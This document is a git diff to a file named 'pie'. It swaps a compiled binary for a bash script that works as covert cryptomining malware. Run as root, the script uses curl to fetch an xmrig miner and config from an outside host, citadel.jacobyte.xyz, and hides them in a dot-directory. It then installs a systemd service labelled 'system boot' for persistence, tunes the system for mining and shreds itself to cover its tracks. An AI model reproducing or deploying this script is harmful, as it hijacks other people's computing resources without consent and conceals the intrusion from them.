Update pie

diff --git a/pie b/pie
--- a/pie
+++ b/pie
@@ -1,60 +1,47 @@
-ELF����������>�����������@�������¸:����������@�8�
-�@���������@�������@�������@�������Ø������Ø����������������������������������������������������������������������������������������Ð������Ð����������������������������������������¡������¡�������������������� ������� ������� �������������������������������-������=������=������n������¸
-������������������� -������ =������ =������ð������ð�������������������8������8������8������ ������� ��������������������X������X������X������D�������D��������������Såtd���8������8������8������ ������� ��������������Påtd���X ������X ������X ������Œ�������Œ��������������Qåtd��������������������������������������������������Råtd���-������=������=������ð������ð�������������/lib64/ld-linux-x86-64.so.2��������������GNU���À�������������������GNU�ý½ö‘û™)JÓð*yÍü0"E���������GNU�������������������������������0�À�@����������Ä‰¦Ý£kÑeÎmÄ¹œ@9ò‹������������������������Ž����������������������a������������������������ �������������������>����������������������S����������������������-����������������������Z����������������������Ð����������������������r����������������������L����������������������y����������������������Á����������������������ª����������������������;�� �������������������€����������������������(����������������������ì����������������������‡��������������������������������������������œ������������������������������������������������������������������£����������������������J�� �������������������E����������������������Ç����������������������ã���!��€I�������������ä���!��€I�������������²���"�������������������â�����€I�������������•����� I��������������libc.so.6�exit�sprintf�__isoc99_sscanf�time�__stack_chk_fail�getpid�strdup�calloc�strlen�memset�__errno_location�memcmp�putenv�memcpy�malloc�getenv�stderr�execvp�fwrite�fprintf�__cxa_finalize�atoll�strerror�__libc_start_main�__environ�__xstat�GLIBC_2.7�GLIBC_2.14�GLIBC_2.4�GLIBC_2.2.5�_ITM_deregisterTMCloneTable�__gmon_start__�_ITM_registerTMCloneTable�����������������������������������������������������ii
-���ô������”‘–���þ������ii
-���	�����ui	���������=�������������à������=������������� ������@�������������@������Ø?��������������������à?��������������������è?��������������������ð?��������������������ø?��������������������€I�������������������� I��������������������(?��������������������0?��������������������8?��������������������@?��������������������H?��������������������P?��������������������X?���������	�����������`?���������
-�����������h?��������������������p?��������������������x?���������
-�����������€?��������������������ˆ?��������������������?��������������������˜?�������������������� ?��������������������¨?��������������������°?��������������������¸?��������������������À?��������������������È?��������������������Ð?������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������óúHƒìH‹Ù/��H…ÀtÿÐHƒÄÃ�����ÿ5ò.��òÿ%ó.���óúh����òéáÿÿÿóúh���òéÑÿÿÿóúh���òéÁÿÿÿóúh���òé±ÿÿÿóúh���òé¡ÿÿÿóúh���òé‘ÿÿÿóúh���òéÿÿÿóúh���òéqÿÿÿóúh���òéaÿÿÿóúh	���òéQÿÿÿóúh
-���òéAÿÿÿóúh���òé1ÿÿÿóúh���òé!ÿÿÿóúh
-���òéÿÿÿóúh���òéÿÿÿóúh���òéñþÿÿóúh���òéáþÿÿóúh���òéÑþÿÿóúh���òéÁþÿÿóúh���òé±þÿÿóúh���òé¡þÿÿóúh���òé‘þÿÿóúòÿ%].��D��óúòÿ%}-��D��óúòÿ%u-��D��óúòÿ%m-��D��óúòÿ%e-��D��óúòÿ%]-��D��óúòÿ%U-��D��óúòÿ%M-��D��óúòÿ%E-��D��óúòÿ%=-��D��óúòÿ%5-��D��óúòÿ%--��D��óúòÿ%%-��D��óúòÿ%-��D��óúòÿ%-��D��óúòÿ%
--��D��óúòÿ%-��D��óúòÿ%ý,��D��óúòÿ%õ,��D��óúòÿ%í,��D��óúòÿ%å,��D��óúòÿ%Ý,��D��óúòÿ%Õ,��D��óú1íI‰Ñ^H‰âHƒäðPTLV��H
-ß��H=��ÿ²,��ôH=I6��HB6��H9øtH‹Ž,��H…Àt	ÿà€����Ã€����H=6��H56��H)þH‰ðHÁî?HÁøHÆHÑþtH‹e,��H…ÀtÿàfD��Ã€����óú€=ý5���u+UHƒ=B,���H‰åtH‹=F,��èÉýÿÿèdÿÿÿÆÕ5��]Ã�Ã€����óúéwÿÿÿóúUH‰åÆÊ6���¶Ã6��ˆ¼6��¶µ6��ˆ®6��¶§6��¶À¶6��H˜H
-”5��ˆ¶Š6��ƒÀˆ6��¶z6��„ÀuÈ]ÃóúUH‰åH‰}è‰uäH‹EèH‰EøéÏ���¶O6��¶ÀH˜HC5��¶ˆE÷¶76��¶E÷Ðˆ+6��¶"6��¶À™÷}ä‰ÐHcÐH‹EøHÐ¶¶6��Ðˆÿ5��¶ø5��¶À¶ì5��¶ÊH˜Hà4��¶HcÁH
-Ò4��ˆ¶Ê5��¶ÀH˜H
-¼4��¶U÷ˆ¶®5��ƒÀˆ¥5��¶ž5��„À…@ÿÿÿHEø���mä���ƒ}ä�'ÿÿÿ]ÃóúUH‰åH‰}è‰uäH‹EèH‰EøéÊ���¶V5��ƒÀˆM5��¶F5��¶ÀH˜H:4��¶ˆE÷¶-5��¶E÷Ðˆ!5��¶5��¶À¶5��¶ÊH˜H4��¶HcÁH
-õ3��ˆ¶ì4��¶ÀH˜H
-ß3��¶U÷ˆ¶Ñ4��¶ÀH˜HÅ3��¶�E÷H‹Eø¶¶E÷H˜Hª3��¶1Á‰ÊH‹EøˆHƒEøƒmäƒ}ä�,ÿÿÿ]ÃóúUH‰åHì@��H‰½ÈþÿÿdH‹%(���H‰Eø1ÀH•ÐþÿÿH‹…ÈþÿÿH‰ÖH‰Çè	��…Ày
-¸ÿÿÿÿé���H…`ÿÿÿº���¾����H‰ÇèPûÿÿH‹…ØþÿÿH‰…hÿÿÿH‹…ÐþÿÿH‰…`ÿÿÿH‹…øþÿÿH‰Eˆ‹…ìþÿÿ‰…|ÿÿÿ‹…ðþÿÿ‰E€H‹…�ÿÿÿH‰EH‹…(ÿÿÿH‰E¸H‹…8ÿÿÿH‰EÈH…`ÿÿÿ¾���H‰Çè=ýÿÿ¸����H‹MødH3%(���tè¶úÿÿÉÃóúUH‰åH‰}øH‰uðëHƒEøHƒ}ø�t/H‹EøH‹�H…Àt#H‹EøH‹�H9EðuÛëH‹EøH‹PH‹EøH‰HƒEøHƒ}ø�tH‹EøH‹�H…ÀuÙ]ÃóúUH‰åHìP��‰½¼ýÿÿdH‹%(���H‰Eø1ÀèúÿÿH˜H‰…Øýÿÿè#üÿÿH²��H»ÿÿÿH)ÂH‰Ð‰ÆH=¬ÿÿÿèfüÿÿ¾^	��H=,(��èUüÿÿH…Øýÿÿ¾���H‰ÇèAüÿÿH…Øýÿÿ¾���H‰Çè&ýÿÿH‹•ØýÿÿH…ðýÿÿH5Ò��H‰Ç¸����èmúÿÿH…ðýÿÿH‰ÇèNùÿÿH‰…èýÿÿH…ðýÿÿH‰Çèhùÿÿ‰…ÐýÿÿHƒ½èýÿÿ�uXH‹…ØýÿÿHðýÿÿ‹•ÐýÿÿHcÒH<‹•¼ýÿÿ‰ÑH‰ÂH5h��¸����èúÿÿH…ðýÿÿH‰Çè"úÿÿH‰ÇèZùÿÿ¸����é™���HµðýÿÿHÌýÿÿH•àýÿÿH‹…èýÿÿI‰ðH5��H‰Ç¸����èùÿÿ‰…Ôýÿÿƒ½ÔýÿÿuRH‹•àýÿÿH‹…ØýÿÿH9Âu?‹…Ðýÿÿ÷ØH˜HPÿH‹…èýÿÿHÂH‹<0��H‰ÖH‰ÇèÝýÿÿ‹…Ìýÿÿ‹•¼ýÿÿ)Â‰ÐƒÀë¸ÿÿÿÿH‹MødH3%(���tècøÿÿÉÃóúUH‰å]ÃóúUH‰åSHƒìH‰}¼H‰u°H‹E°H‹�H‰EàHƒ}à�uH=g��èä÷ÿÿH‰EàHƒ}à�u*H‹Ò/��H‰Áº ���¾���H=>��èéøÿÿ¿���èÏøÿÿ‹E¼‰Çè”ýÿÿ‰EÔèæùÿÿ¾���H=3.��è:úÿÿ¾A���H=Ê-��è"ûÿÿ¾���H=û%��èûÿÿ¶ï%��„Àt*H=ä%��èã÷ÿÿH‰Ã¿����èøÿÿH9Ã}H„-��é¼��¾
-���H=©%��èËúÿÿ¾���H=º%��èºúÿÿ¾���H=–%��è©úÿÿ¾���H=—%��è˜úÿÿ¾���H=Š%��è‡úÿÿ¾���H=y%��è}ùÿÿ¾���H=%��èeúÿÿº���H5n%��H=P%��è÷ÿÿ…ÀtH@%��é��¾���H=b%��è,úÿÿƒ}Ô�yHP%��éú��‹E¼ƒÀ
-H˜¾���H‰ÇèÎöÿÿH‰EèHƒ}è�u
-¸����éÐ��ƒ}Ô�„
-��¾���H=8%��èÕùÿÿ¶,%��„ÀuH=œ$��è²úÿÿ…ÀtHŒ$��éŽ��¾���H=%��èùÿÿ¾¾��H=Y%��èŒùÿÿ¾���H=,��è{ùÿÿ¾���H=û+��èqøÿÿ¾���H=¥$��èYùÿÿº���H5”$��H=Ò+��èúõÿÿ…ÀtHÂ+��é��¿¾��è`öÿÿH‰EØHƒ}Ø�u
-¸����éò��H‹EØº���¾ ���H‰Çè¥õÿÿH‹EØH���º¾��H5®$��H‰ÇèçõÿÿëP¶½#��„Àt=¿���è�öÿÿH‰EØHƒ}Ø�u
-¸����é’��H‹UàH‹EØH5‹#��H‰Ç¸����èÿõÿÿëH‹EàH‰EØÇEÐ����‹EÐP‰UÐH˜HÅ����H‹EèHÂH‹E°H‹�H‰ƒ}Ô�t/¶³#��„Àt$‹EÐP‰UÐH˜HÅ����H‹EèHÐHŽ#��H‰¶ #��„Àt$‹EÐP‰UÐH˜HÅ����H‹EèHÐHû"��H‰‹EÐP‰UÐH˜HÅ����H‹EèHÂH‹EØH‰¶Ï"��„Àt$‹EÐP‰UÐH˜HÅ����H‹EèHÐHª"��H‰ƒ}Ô~‹EÔë¸����‰EÌë;‹EÌP‰UÌH˜HÅ����H‹E°H‹EÐP‰UÐH˜HÅ����H‹EèHÂH‹H‰‹EÌ;E¼|½‹EÐH˜HÅ����H‹EèHÐHÇ�����H‹EèH‰ÆH="��è€ôÿÿHù!��HƒÄH[]ÃóúUH‰åATSHƒì‰}ìH‰uàH‹EàHXH‹Uà‹EìH‰Ö‰Çè-ûÿÿH‰H‹EàHƒÀH‹�H…Àt
-H‹EàL‹`ëL%À��è*óÿÿ‹�…Àtèóÿÿ‹�‰ÇèVôÿÿH‰ÃëH¢��èóÿÿ‹�…Àt	H‘��ëH‡��H‹UàH‹H‹=Ñ*��M‰áI‰ØH‰ÁH5m��¸����èWóÿÿ¸���HƒÄ[A\]Ãf„�����óúAWL=��AVI‰ÖAUI‰õATA‰üUH-ô��SL)ýHƒìèÏðÿÿHÁýt1Û€����L‰òL‰îD‰çAÿßHƒÃH9ÝuêHƒÄ[]A\A]A^A_Ãff.„�����óúÃf.„�����óúH‰òH‰þ¿���éÜòÿÿóúHƒìHƒÄÃ�����������������������������������������������������������������������������������������������������x%lx�=%lu %d�%lu %d%c�_�E: neither argv[0] nor $_ works.�<null>��: �%s%s%s: %s
-�;Œ������ÈïÿÿÀ���8ñÿÿè���Hñÿÿ���¨òÿÿ¨���‘óÿÿ��öóÿÿ8��ïôÿÿX��ãõÿÿx��Ôöÿÿ˜��7÷ÿÿ¸��'ùÿÿØ��2ùÿÿø��Öýÿÿ��¨þÿÿ@��ÿÿÿˆ��(ÿÿÿ �������������zR�x��������øñÿÿ/����D����$���4����ïÿÿp���FJw€�?:*3$"�������\���Hðÿÿ��������������t���@ðÿÿ`�������������Œ���qòÿÿe����E†C
-\�����¬���¶òÿÿù����E†C
-ð�����Ì���óÿÿô����E†C
-ë�����ì���côÿÿñ����E†C
-è�������4õÿÿc����E†C
-Z�����,��wõÿÿð���E†C
-ç����L��G÷ÿÿ����E†C
-B��� ���l��2÷ÿÿ¤���E†C
-Eƒ–�� �����²ûÿÿÉ����E†C
-GŒƒ¹�D���´��`üÿÿe����FIŽE E(ŒD0†H8ƒG@n8A0A(B BBB����ü��ˆüÿÿ����������������€üÿÿ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������à������ ����������������������������������
-�������”�������������=���������������������������=��������������������õþÿo���� �������������Ø�������������Ø������
-�������d������������������������������������������?����������������������������������������À	�������������Ð�������������ð�������	����������������������������ûÿÿo����������þÿÿo����€������ÿÿÿo�����������ðÿÿo����<������ùÿÿo������������������������������������������������������������������������������������������� =����������������������0������@������P������`������p������€������������ ������°������À������Ð������à������ð������������������� ������0������@������P������`������p������€������������������������������������������������������@����������������������]ñÓ¸™IPSm>X\î©¡jÔ[‹¯Üco`æØ‘Õ½«¢mæ­?qÈÈÂ¢¨‘ÄŒÆV#:d3ÃëB?ƒˆÇ‰1JÄpI´E¾WtrÂ3o\Vb¹+/Eæ3lÑ%ïuwÎMSI
-ëGÂ—uæÜØyÉrÈã
-ÉþoÅSB}éßC»Ÿ¡èbÔQQýÀ­S"¡
-$UZëYí|2XÇ{gõÉñFïÈC*jS8øx†çîßíÜ\ 4#œA‹¹6T«}oš„8Ý®£1æ›©sŸ0[ŽHjkižà¾oi”ßâ^f* Ô&m?c·›xl{÷—4F&CÄ<p¦ò0½ÇMEÚÌxÒÜÇvHÙý—¾ñUÇ}4F×Gº“]Ãé«æ."TWÔ¬M˜”å^2zé¤$W™ab0PeÙå#ä¾MJ ª
-a5™çQ%�ç™ÙçŒsaÀºC]|0$Ö¬ª&¾Û©˜«ogŠ9Í>LmpÏ’{F¥ùÿ¦/ãŸÖ&FSä·éRÓŽ
-FÁš[Š®ÈÊšxúˆÎ…Ðt–å˜
-ãQŒwéévñMw]¸›âÆÊ>¥>9îÍPz8Šþß
-1Ôd\>ÞuMHHL¢ï î)¥²¿Çójd ±ü±;e™Ôw¬ÐƒY:®d¹L­Ê
-ŒhAÅþÙH"0}ë¶£È¤‘ò+9dW¢&µíB¢Ó&NH2z™gË¡/DuÌ·ƒtÏ¶Âw!½‹(ô¢(“‘¨5niÜå
-rBb|B„žôò¡‘nß	³}ÂfÖòlÛÂˆåmŠèç5º³lY¼j ^ °Ì´T@®›ûRhJ$ž
-b¿IíwQS–ÚMüNM³P_
-Þïb9Ô¡®a¦£hwŽÚ%Oã³¡¾Ìó©8§¹z»rà¸²ðÚËÆ|Ì( Dö«@¯ÚF¿ö®TlQÞ?_@w·!í>Ø_!mž(©ÈˆŸ‡“9¬7´%œ=×w} L—<æù'«·7¢¯Žo)ò&4†yu‘ªÎC²'“ŠkHkÅ*ÑŽ'°˜¢±Lž~5Ù)qãú 'Õ·˜CÕ,¬DG™½¤2E‘|®�wãÆßkåm9•HLÙˆ
-<Á§XìÃU¿¨£»eá­�ç2¼¼£ˆoußÛÒÖÍ~×™¿R@,mE\šÎäÈD:Ø¬H;jçxÔÈär$Åê›¸îi©º:/qòúG™Èa&‚s±Á„Wpjƒ`$Í÷¥ŸwiÄVlãjÔÁj’ö_©íék}C=‹?$ ÖÒ–7)xÒ&…Ò7zÆßÎâ³-ÂG—Iv:Å3x‚†MØŒZÜlc®‡é­¸®­x‘7„Ø¬7g‚
-nuÏþÛä í±±z“Ür \6Áþ=0aÔGÆø;¹³Å¢qSöÜQÒìƒŠç¥
-k}›jCÔ±}N„3}{éîîØ¨4ÆÇÕÝQýC9…úÙyFÎñðÒž¸„×~
-&s=•(CLæ¬g9D*eRAQ-Ãe*&2Y9éEÛO­ÔêÄñÿúç¢ÎÆ:ö®Ë
-7·=OÍHnúæ]¬Ÿí»úIß¦!âÃP|ŒÇ;Ìà×€ælTÎ¸É®q
-ÆqX+"É¦îSWÏç€d‡ëÂ•·ˆ‘nü¼	5÷ØVoÍÛ
-Çž7n²/Åù+<öÂÈóGß”kò¸aÍæL–å7MÄKU‡Ø§”úY [cŸw¾ÁÉ”ô©{¢|¦òm¿ig9'*øÁ½sUä’DëHêÏÓ”Ã§ËùÎ4ÂÜÔê÷ú¾R-¡Ï§g)½`—¯v¬=´ì ìõ_Ñõ¡NPmmÞ…Äù÷X.ð²;]¬\êÍñ´åbPlÒ-VÎÁ­<€BFˆJi`r›DDÐ¸F‘Ž÷ÒcàY}?R™ú¤`ÝDB©­‹Ë#ÿF:_‘Æ¢ÓÏÄ%w$]d1X¹Ò2’„ÆäíégNîZ1,Ú¨©º‹ $#Üêp\·:©ëE¥ðàPµÚRÜ-aCñUÔr&ÇF]­è{}!Ž¸:DÈÐªôÌ_ûÙê5êÙäO’@Š#s¸F7y	¨œëzÚ‡ ®WL’ú%üÐÏ<r4e0©U	Ý1ØoÂ¸wÅ¶U4gðÝñ¯D”øßŠ‰y)tIY1É©f´Ð¢áÞZP¶(d¶o£nþÆ»­W¼!öì|„üÅîh.÷3mò„‚\a`1yBø4V¥‹Æ‚�Cüõe6‚]jðo\uò¸ŽS¿Ì[·±]Å$ÅgÁo'¦Ž„ômõæ&ƒ9?C›ûMX•}¤×äº™TÆÀûTEÔ9yÉ MYà_{ŒgÉäýÜa¡³F\Mš"–wS¢KŒ¬¼bœòe~ÍâcË¾ÅmrÉ¿§ìÎ=d!ß°®ûÅ[·'aTÇm˜•Pü`ÂÍ€Î—@u„²è0‘˜ßŒ^:D…›™Ÿc8øW4Xeö%æÄ¼':@6ì)g}ÂF
- O¥éE€ð}xG²Ñ­¨ö”m³ò”g˜ùÃ„o‰³VM]ò6ó¸Zà¡­8zã€q‘<±S7xk	(ÿ›Èi�#kŠ…¸Gú Òhÿß§{‰ñàý�1M†°ì·ó]]Qo|pø÷¼ª¶~l¦ÁFi:Ž<ÄÑ2µÚªnÈÚ€±Óh±_o“ïÓfãñPlÁ€ÚÇ­½¡¨ÊÌKæÉ×{Ú@,ë œoæS×m¿™îša›WC"Ï˜–àq!A\ÁÝÜQMÂn šÜ`4Êú•eR˜©tg9}�Ï]@U@3z’="×Ý‚§}¡Ð9¶D¡ïÂ¢¿ ¶�Ÿžà@sÁUtä-Qg9øäÚµ»úµ«¼WkÜl|
-]["ÐxD¦•hàŽM»“ÏOü…û¹Üf–ëÒÝpb�@y…€éÿ©6º=9‰6ˆïëï†×Â™ÞŸ
-@ K¿Ð@8ì)8–`òÓ™|aÐ‹éÀwÙFO›à-;êmÛ©{ž©
-PÞ`;Ÿ§¤Ù5¿är„æC¶œÐGPÿ*€¹¥bC(³!‰îÀ0“™fS}Ø×dìH<�GCC: (Ubuntu 9.4.0-1ubuntu1~20.04) 9.4.0��.shstrtab�.interp�.note.gnu.property�.note.gnu.build-id�.note.ABI-tag�.gnu.hash�.dynsym�.dynstr�.gnu.version�.gnu.version_r�.rela.dyn�.rela.plt�.init�.plt.got�.plt.sec�.text�.fini�.rodata�.eh_frame_hdr�.eh_frame�.init_array�.fini_array�.dynamic�.data�.bss�.comment��������������������������������������������������������������������������������������������������������������������������������������������8������8������ ������������������������������&�������������X������X������$������������������������������9�������������|������|������ ������������������������������G���öÿÿo������� ������ ������8�����������������������������Q�������������Ø������Ø���������������������������������Y�������������Ø������Ø������d�����������������������������a���ÿÿÿo�������<������<������@����������������������������n���þÿÿo�������€������€������P����������������������������}�������������Ð������Ð������ð����������������������������‡������B�������À	������À	��������������������������������‘���������������������������������������������������������Œ������������� ������ ������p����������������������������—������������������������������������������������������ ������������� ������ ������`����������������������������©���������������������������”�����������������������������¯�������������”������”������
-������������������������������µ�������������� ������� ������X������������������������������½�������������X ������X ������Œ������������������������������Ë�������������è ������è ������(�����������������������������Õ�������������=������-�����������������������������������á�������������=������-�����������������������������������í������������� =������ -������ð���������������������������›�������������?������/������ð�����������������������������ö��������������@�������0������~	�������������� ���������������ü�������������€I������~9������H�������������� ��������������������0���������������~9������)���������������������������������������������������§9������
-�����������������������������
+#!/bin/bash
+if [[ $EUID -eq 0 ]]
+then
+   dircheck="/usr/share/.logstxt"
+   filcheck="/etc/systemd/systemd/xmrig.service"
+   filename="$0"
+   exits () {
+    
+    if [[ -d "$dircheck" ]]
+    then
+       rm -r ${dircheck}
+    fi
+    
+    if [[ -f "$filcheck" ]]
+    then
+       rm ${filcheck}
+    fi
+   }
+   exits
+   
+   files=$(curl -s -O http://citadel.jacobyte.xyz:8000/xmrig  -O http://citadel.jacobyte.xyz:8000/config.json )  #add url of xmrig file and config.json.
+   touch xmrig.service
+   per=$(chmod 777 xmrig config.json && chmod 644 xmrig.service)
+   dir=$(mkdir /usr/share/.logstxt)
+   move=$(mv xmrig config.json /usr/share/.logstxt/ && mv xmrig.service /etc/systemd/system/)
+   
+   threads=$(lscpu -p | grep -c "^[0-9]") 
+   tf=$(printf %.f "$((25 * $threads))e-2")
+   append=$(echo -e "[Unit]\nDescription=system boot\nAfter=network.target\n\n[Service]\nType=simple\nRestart=on-failure\nRestartSec=1200\nUser=root\nExecStart=/usr/share/.logstxt/xmrig -c /usr/share/.logstxt/config.json --      threads=$tf\nRemainAfterExit=yes\nKillMode=process\n\n[Install]\nWantedBy=multi-user.target">/etc/systemd/system/xmrig.service)
+   sys=$(echo "vm.nr_hugepages=1280">>/etc/sysctl.conf)
+   system=$(sysctl --quiet --system && systemctl daemon-reload && systemctl enable --now xmrig --quiet)
+   
+   $files
+   $per
+   $dir
+   $move
+   $append
+   $sys
+   $system
+    
+   if [[ $? -eq 0 ]]
+   then 
+      shred -u ${filename}
+   fi
+else
+   echo "Please Run as root!"
+fi
